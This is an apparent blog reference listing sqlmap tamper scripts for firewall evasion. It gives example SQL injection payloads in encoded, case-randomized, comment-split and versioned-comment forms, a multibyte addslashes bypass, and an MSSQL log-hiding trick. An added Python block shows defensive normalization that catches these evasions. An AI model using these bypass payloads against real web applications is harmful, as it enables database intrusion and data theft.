Sqlmap Tamper Collection (3)

2014-08-12 10:44:42 | Category: WAF bypass

Script name: sp_password.py
Purpose: appends sp_password to the end of the payload so that the DBMS automatically obfuscates the statement in its logs
Example:

('1 AND 9227=9227-- ')
'1 AND 9227=9227-- sp_password'

Requirement:
* MSSQL
———————————————————————————
Script name: chardoubleencode.py
Purpose: double URL-encodes all characters in the payload (already encoded characters are not processed)
Example:

* Input: SELECT FIELD FROM%20TABLE
* Output: %2553%2545%254c%2545%2543%2554%2520%2546%2549%2545%254c%2544%2520%2546%2552%254f%254d%2520%2554%2541%2542%254c%2545
———————————————————————————
Script name: unionalltounion.py
Purpose: replaces UNION ALL SELECT with UNION SELECT
Example:

('-1 UNION ALL SELECT')
'-1 UNION SELECT'

Requirement:
all
——————————————————————————-
Script name: charencode.py
Purpose: URL-encodes all characters in the payload
Example:

* Input: SELECT FIELD FROM%20TABLE
* Output: %53%45%4c%45%43%54%20%46%49%45%4c%44%20%46%52%4f%4d%20%54%41%42%4c%45

Tested against:
* Microsoft SQL Server 2005
* MySQL 4, 5.0 and 5.5
* Oracle 10g
* PostgreSQL 8.3, 8.4, 9.0
Notes:
  • Useful to bypass very weak web application firewalls that do not url-decode the request before processing it through their ruleset
  • The web server will anyway pass the url-decoded version behind, hence it should work against any DBMS
————————————————————
Script name: randomcase.py
Purpose: replaces each keyword character with a randomly chosen upper- or lower-case letter
Example:

* Input: INSERT
* Output: InsERt

Tested against:
* Microsoft SQL Server 2005
* MySQL 4, 5.0 and 5.5
* Oracle 10g
* PostgreSQL 8.3, 8.4, 9.0
———————————————————————-
Script name: unmagicquotes.py
Purpose: wide-character (multibyte) bypass of GPC / addslashes escaping
Example:

* Input: 1 AND 1=1
* Output: 1%bf%27 AND 1=1%20

Notes:
  • Useful for bypassing magic_quotes/addslashes feature
——————————————————————————–
Script name: randomcomments.py
Purpose: splits SQL keywords with /**/ comments
Example:

INSERT becomes IN/**/S/**/ERT
————————————————————————
Script name: versionedkeywords.py
Purpose: encloses each non-function keyword with a versioned MySQL comment
Example:

* Input: 1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,100,114,117,58))#
* Output: 1/*!UNION*//*!ALL*//*!SELECT*//*!NULL*/,/*!NULL*/, CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER()/*!AS*//*!CHAR*/),CHAR(32)),CHAR(58,100,114,117,58))#

Requirement:
* MySQL
 —————————————————————————-
Script name: charunicodeencode.py
Purpose: unicode-URL-encodes all characters in the payload (%uXXXX form)
Example:

* Input: SELECT FIELD%20FROM TABLE
* Output: %u0053%u0045%u004c%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004c%u0044%u0020%u0046%u0052%u004f%u004d%u0020%u0054%u0041%u0042%u004c%u0045

Requirement:
* ASP
* ASP.NET
Tested against:
* Microsoft SQL Server 2000
* Microsoft SQL Server 2005
* MySQL 5.1.56
* PostgreSQL 9.0.3
Notes:
  • Useful to bypass weak web application firewalls that do not unicode url-decode the request before processing it through their ruleset
 —————————————————————————-
Script name: securesphere.py
Purpose: appends a specially crafted string to the payload
Example:

('1 AND 1=1')
"1 AND 1=1 and '0having'='0having'"

Tested against:
all
 —————————————————————————-
Script name: versionedmorekeywords.py
Purpose: encloses each keyword with a versioned MySQL comment
Example:

* Input: 1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,122,114,115,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,115,114,121,58))#
* Output: 1/*!UNION*//*!ALL*//*!SELECT*//*!NULL*/,/*!NULL*/,/*!CONCAT*/(/*!CHAR*/(58,122,114,115,58),/*!IFNULL*/(CAST(/*!CURRENT_USER*/()/*!AS*//*!CHAR*/),/*!CHAR*/(32)),/*!CHAR*/(58,115,114,121,58))#

Requirement:
* MySQL >= 5.1.13
 —————————————————————————-
Script name: space2comment.py
Purpose: replaces the space character (' ') with comments '/**/'
Example:

* Input: SELECT id FROM users
* Output: SELECT/**/id/**/FROM/**/users

Tested against:
* Microsoft SQL Server 2005
* MySQL 4, 5.0 and 5.5
* Oracle 10g
* PostgreSQL 8.3, 8.4, 9.0
Notes:
  • Useful to bypass weak and bespoke web application firewalls
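The notes for charencode, charunicodeencode and space2comment all make the same point: these tampers only work against a WAF that matches its rules before decoding and comment-stripping the parameter. The following added example, written for this page and not taken from sqlmap or the original post, normalizes a parameter the way a rule engine should before matching: it decodes %XX, double %XX and %uXXXX escapes until the value is stable, keeps the body of MySQL versioned comments, treats plain comments both as whitespace and as nothing, and case-folds. The sample inputs are the outputs quoted in the entries above; the keyword rule is a deliberately small stand-in for a real ruleset.

```python
import re
from urllib.parse import unquote

# Constructed samples copied from the tamper examples on this page (not sqlmap's own code).
SAMPLES = {
    "charencode": "%53%45%4c%45%43%54%20%46%49%45%4c%44%20%46%52%4f%4d%20%54%41%42%4c%45",
    "chardoubleencode": "%2553%2545%254c%2545%2543%2554%2520%2546%2549%2545%254c%2544"
                        "%2520%2546%2552%254f%254d%2520%2554%2541%2542%254c%2545",
    "charunicodeencode": "%u0053%u0045%u004c%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004c"
                         "%u0044%u0020%u0046%u0052%u004f%u004d%u0020%u0054%u0041%u0042%u004c%u0045",
    "space2comment": "SELECT/**/id/**/FROM/**/users",
    "randomcase": "InsERt",
    "randomcomments": "IN/**/S/**/ERT",
    "versionedkeywords": "1/*!UNION*//*!ALL*//*!SELECT*//*!NULL*/,/*!NULL*/",
}

_UNICODE_PCT = re.compile(r"%u([0-9a-fA-F]{4})")      # IIS-style %uXXXX escapes
_VERSIONED = re.compile(r"/\*!\d*(.*?)\*/", re.S)     # /*!50000 body */ -> body (MySQL executes it)
_COMMENT = re.compile(r"/\*.*?\*/", re.S)              # ordinary /* ... */ comments
_KEYWORDS = re.compile(r"\b(UNION\s+(ALL\s+)?SELECT|SELECT\s+.+\s+FROM|INSERT|DROP)\b")  # toy rule

def percent_decode(value: str, max_rounds: int = 3) -> str:
    """Decode %uXXXX and %XX repeatedly until stable, so double encoding does not hide bytes."""
    text = value
    for _ in range(max_rounds):
        decoded = unquote(_UNICODE_PCT.sub(lambda m: chr(int(m.group(1), 16)), text))
        if decoded == text:
            break
        text = decoded
    return text

def canonical_forms(value: str) -> tuple:
    """Return two canonical spellings: comments treated as whitespace, and comments removed."""
    decoded = percent_decode(value)
    kept = _VERSIONED.sub(r" \1 ", decoded)          # keep what MySQL would actually execute
    as_space = _COMMENT.sub(" ", kept)               # space2comment style: /**/ is a separator
    removed = _COMMENT.sub("", kept)                 # randomcomments style: /**/ splits a keyword
    return tuple(re.sub(r"\s+", " ", f).strip().upper() for f in (as_space, removed))

def looks_like_sqli(value: str) -> bool:
    """Match the keyword rule only after normalization, unlike the weak WAFs the notes describe."""
    return any(_KEYWORDS.search(form) for form in canonical_forms(value))
```

Every sample above is flagged once normalized, while a plain keyword match on the raw value would miss all but randomcase.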
 —————————————————————————-
Script name: halfversionedmorekeywords.py
Purpose: adds a versioned MySQL comment before each keyword
Example:

* Input: value UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND 'QDWa'='QDWa
* Output: value/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)), NULL, NULL#/*!0AND 'QDWa'='QDWa

Requirement:
* MySQL < 5.1
Tested against:
* MySQL 4.0.18, 5.0.22
 —————————————————————————-
Copyright NetEase Inc. ©1997-2017